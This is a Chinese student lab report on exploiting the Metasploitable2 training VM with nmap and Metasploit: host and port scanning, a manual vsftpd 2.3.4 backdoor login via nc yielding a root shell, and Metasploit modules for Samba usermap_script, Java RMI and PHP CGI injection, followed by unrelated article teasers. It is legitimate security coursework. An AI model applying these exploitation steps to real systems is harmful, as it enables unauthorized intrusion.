20222422 2024-2025-1 《网络与系统攻防技术》实验六实验报告

news/2024/12/27 1:04:33/文章来源:https://www.cnblogs.com/20222422tky/p/18547542

一、实验内容

本实践目标是掌握metasploit的用法。

指导书参考Rapid7官网的指导教程。
https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/
下载官方靶机Metasploitable2,完成下面实验内容。
用户名密码均为:msfadmin

(1)前期渗透

①主机发现(可用Aux中的arp_sweep,search一下就可以use)。
②端口扫描:可以直接用nmap,也可以用Aux中的portscan/tcp等。
③选做:也可以扫系统版本、漏洞等。

(2)Vsftpd源码包后门漏洞(21端口)
(3)SambaMS-RPC Shell命令注入漏洞(端口139)
(4)Java RMI SERVER命令执行漏洞(1099端口)
(5)PHP CGI参数执行注入漏洞(80端口)

二、实验过程

(1)前期渗透

攻击机:192.168.198.131(kali)
靶机:192.168.198.149(目标靶机Metasploitable2)

①主机发现(使用Aux中的arp_sweep)

(a)进入kali,使用msfconsole
image

(b)搜索arp_sweep模块,并使用相关模块
search arp_sweep
use 0
image

(c)显示模块需要配置的选项
show options
image

(d)设置需要配置的选项
set RHOSTS 192.168.198.131/24
set THREADS 30

(e)执行该模块
exploit
image

从返回结果可以看到,arp_sweep模块很快发现了192.168.198.0/24网段上拥有如上图活跃主机,其中192.168.198.149这个IP地址为目标靶机IP地址。

②端口扫描:直接用nmap

nmap 192.168.198.149
image

③扫描系统版本、漏洞等

(a)扫描操作系统:
nmap -O 192.168.198.149
image

发现操作系统版本为:linux_kernel:2.6

(b)扫描漏洞:

nmap漏洞扫描分类:
auth:负责处理鉴权证书(绕开鉴权)的脚本;
broadcast:在局域网内探查更多服务开启状况,如dhcp、dns、sqlserver等服务;
brute:提供暴力破解方式,针对常见的应用,如http、snmp等;
default:使用-sC或-A选项扫描时候默认的脚本,提供基本脚本扫描能力;
discovery:对网络进行更多的信息,如SMB枚举、SNMP查询等;
dos:用于进行拒绝服务攻击;
exploit:利用已知的漏洞入侵系统;
external:利用第三言的数据库或资源,例如进行whois解析;
fuzzer:模糊测试的脚本,发送异常的包到目标机,探测出潜在的漏洞;
intrusive:入侵性的脚本,此类脚本可能引发对方的IDS/IPS的记录或屏蔽;
malware:探测目标机是否感染了病毒、开启了后门等信息;
safe:此类与intrusive相反,属于安全性脚本;
version:负责增强服务与版本扫描(Version Detection)功能的脚本;
vuln:负责检查目录机是否有常见的漏洞(Vulnerability),如是否有MS08_067;

使用指令:
nmap --script=xxx 192.168.198.149 其中xxx为上述分类中的单词

例如:探测目标机是否感染了病毒、开启了后门等信息
nmap --script=malware 192.168.198.149
image

发现ftp端口有后门漏洞

(2)Vsftpd源码包后门漏洞(21端口)

攻击机:192.168.198.131(kali)
靶机:192.168.198.149(目标靶机Metasploitable2)

(a)测试kali与靶机的连通性:
image

image

(b)在kali 终端下对靶机ip地址进行扫描,查看端口情况
nmap 192.168.198.149
image

发现21号端口是开放的

(c)继续扫描该端口版本
nmap -p 21 192.168.198.149 -sV
image

发现是含有笑脸漏洞的vsftpd版本

(d)查看6200端口情况
nmap -p 6200 192.168.198.149
image

发现是关闭的

(e)连接21端口并通过笑脸漏洞登录
nc 192.168.198.149 21

user 任意用户名(以“:)”结尾即可)这里用的是:tky:)

pass 任意密码这里用的是:20222422
image

(f)重新打开一个终端,查看6200端口情况
nmap -p 6200 192.168.198.149
image

发现已经打开

(g)获取shell
nc 192.168.198.149 6200
image

发现成功获取shell,可以使用ls,ifconfig等指令

输入whoami
image

发现是root权限

(h)用msfconsole利用漏洞
利用search命令查找我们需要的漏洞模块vsftpd(笑脸漏洞),使用模块
search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
image

进行设置:
image

执行结果如下:
image

发现成功获取shell

(3)SambaMS-RPC Shell命令注入漏洞(端口139)

攻击机:192.168.198.131(kali)
靶机:192.168.198.149(目标靶机Metasploitable2)

(a)启动metasploit
msfconsole

image

(b)选择漏洞库
search samba
use exploit/multi/samba/usermap_script

image

(c)设置参数
show options
set RHOST 192.168.198.149

image

(d)开始攻击
exploit

image

成功控制shell

(4)Java RMI SERVER命令执行漏洞(1099端口)

攻击机:192.168.198.131(kali)
靶机:192.168.198.149(目标靶机Metasploitable2)

(a)查看1099端口是否开启
Nmap –p 0-65535 192.168.198.149

image

发现1099端口开启

(b)启动metasploit
msfconsole

image

(c)选择漏洞库
search rmi
use exploit/multi/misc/java_rmi_server

image

(d)设置参数
show options
set RHOST 192.168.198.149

image

(e)开始攻击
exploit

image

成功控制shell

(5)PHP CGI参数执行注入漏洞(80端口)

(a)启动metasploit
msfconsole

image

(b)选择漏洞库
use exploit/multi/http/php_cgi_arg_injection

image

(c)设置参数
show options
set RHOST 192.168.198.149

image

(d)开始攻击
exploit

image

成功控制shell

三、问题及解决方案

问题一:在Vsftpd源码包后门漏洞(21端口),连接21端口并通过笑脸漏洞登录时取名“tky:)”的时候使用中文的“:”,导致不成功。
问题一解决方案:更改英文输入法再输入冒号。

问题二:使用nmap -p 6200 192.168.198.149等扫描指令后发现无法执行。
问题二解决方案:发现是“-”这个符号出了问题,将“-p”重新输入一遍解决。

四、学习感悟、思考等

在本次渗透测试实验中,我深入学习并实践了如何利用Metasploit框架进行漏洞的发现和利用。实验的主要目标是通过对Metasploitable 2靶机的渗透,掌握常见漏洞的利用方式以及相关工具的使用。首先,我通过Metasploit的nmap模块对靶机进行端口扫描,识别出开放的端口和运行的服务。接下来,通过对这些服务的分析,我确定了几个潜在的漏洞,分别针对Vsftpd后门漏洞、Samba MS-RPC漏洞、Java RMI Server漏洞和PHP CGI参数执行漏洞进行了进一步的研究。
通过这次实验,我不仅提高了对Metasploit框架的使用技巧,还加深了对常见漏洞的理解与利用方法,明确了渗透测试的流程和各个环节的重要性。实验让我意识到,网络安全防护不应仅仅依赖外部防御措施,系统设计、配置和编码安全也是防止漏洞的关键。同时,实验过程中也暴露了我在漏洞分析和工具使用上的一些不足,提示我在今后的学习中需要更加注重漏洞原理的深度学习和实践操作的提高。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/836359.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

测试工程师的苦水与解药:别让这些问题毁了你的职业生涯!

咱这些测试工程师啊,外人瞅着好像工作挺简单,不就是找找软件的毛病嘛。可实际上,这里面的苦啊,就像那一团乱麻,扯都扯不清,全是无奈和心酸。 加班加到“怀疑人生” 咱这加班啊,那可真是没个头。经常整到深更半夜,感觉自己都快不是个人了,身体那是越来越差,就像个破机…

使用VS2022打开解决方案后每个项目都显示“不兼容”

1、问题描述 今天本地使用VS2022打开之前新建的项目(.Net6框架),突然出现每个项目都显示“不兼容”的问题,导致每个项目的文件都看不到了,如下图所示:2、解决办法 鼠标右键解决方案,然后选择“解析错误”选项,等待一会所有的项目即可显示出来了,如下图所示:到此,问题…

数据采集与融合技术第四次作业

作业内容 作业①: 要求: 熟练掌握 Selenium 查找HTML元素、爬取Ajax网页数据、等待HTML元素等内容。 使用Selenium框架+ MySQL数据库存储技术路线爬取“沪深A股”、“上证A股”、“深证A股”3个板块的股票数据信息。 候选网站:东方财富网:http://quote.eastmoney.com/center…

【Visio 2024软件下载与安装教程-亲测好用】

Microsoft Visio 2024专业版是一款专业的专业矢量绘图软件。Visio 2024不但新增了许多功能,而且还优化了众多性能,比如用户界面优化、更多图形元素库、允许用户邀请其他人一起编辑和查看图表、过程自动化等等,其一系列的改动旨在给予用户们最直观、最便利的操作体验! 操作系…

工作服穿戴识别系统

工作服穿戴识别系统利用现场装好的监控摄像头24小时对工作场景进行实时监测。工作服穿戴识别系统一旦检测到员工工服穿戴不符合规定的情况,系统能够立即发出警报,提醒相关人员进行处理。通过实时监控和精准报警,工作服穿戴识别系统能够有效规范作业人员的行为。员工知道自己…

桥梁大师_钢筋图_配置汇总

1.2米桩基_【正常】 1.2米桩基_【配抗震钢筋】

值班睡岗智能监测系统

值班睡岗智能监测系统是一种利用人工智能技术,值班睡岗智能监测系统通过现场已有的摄像头进行实时视频分析的系统。系统能够自动识别监测现场人员是否在岗位上,一旦检测到离岗或睡岗行为,系统会实时抓拍并触发报警,将报警信息传送至后台监控平台。系统能够替代人工进行长时…

使用 Nginx Ingress 实现金丝雀发布/灰度发布

使用 Nginx Ingress 实现金丝雀发布/灰度发布 说明: 使用 Nginx Ingress 实现金丝雀发布的集群,需部署 Nginx Ingress 作为 Ingress Controller,并且对外暴露统一的流量入口。详情请参见 在 TKE 上部署 Nginx Ingress。 使用场景 使用 Nginx Ingress 实现金丝雀发布适用场景…

# 20222309 2024-2025-1 《网络与系统攻防技术》实验六实验报告

1.实验内容 本实践目标是掌握metasploit的用法。 指导书参考Rapid7官网的指导教程。 https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/ 下载官方靶机Metasploitable2,完成下面实验内容。 (1)前期渗透 ①主机发现(可用Aux中的arp_sweep,search一…

如何在开源鸿蒙OpenHarmony开启SELinux模式?RK3566鸿蒙开发板演示

本文介绍开源鸿蒙OpenHarmony系统下,开启/关闭SELinux权限的方法,触觉智能Purple Pi OH鸿蒙开发板演示,已适配全新OpenHarmony5.0 Release系统!本文介绍在开源鸿蒙OpenHarmOony系统下,开启/关闭SELinux权限的方法,触觉智能Purple Pi OH鸿蒙开发板演示,搭载了瑞芯微RK356…

locust(服务器压测)

一: 注意事项:项目和压力机不能在同一台机器 二: 1.脚本压测 命令行:locust -f get.py --host=http:ip+host 注意事项Wait_time写0,0 不进行等待 1.脚本压测 2.1服务器防火墙需要关闭 2.2需要把打印去掉 2.3 Download Data 下载报告三.非web模式新版中 -u 指的是多少 用户/…

旺仔水饺-冲刺总结

1. 冲刺内容总结与反思 1.1 项目总结 本次冲刺阶段对项目的不足之处进行了相关改进: 针对团队沟通问题: 我们在本次冲刺阶段几乎是每天召开团队会议,包括沟通效率比较高的的站立会议;我们站立会议每次召开十分钟,尽量在这个十分钟之内大家都都把自己当前进行的的功能模块遇…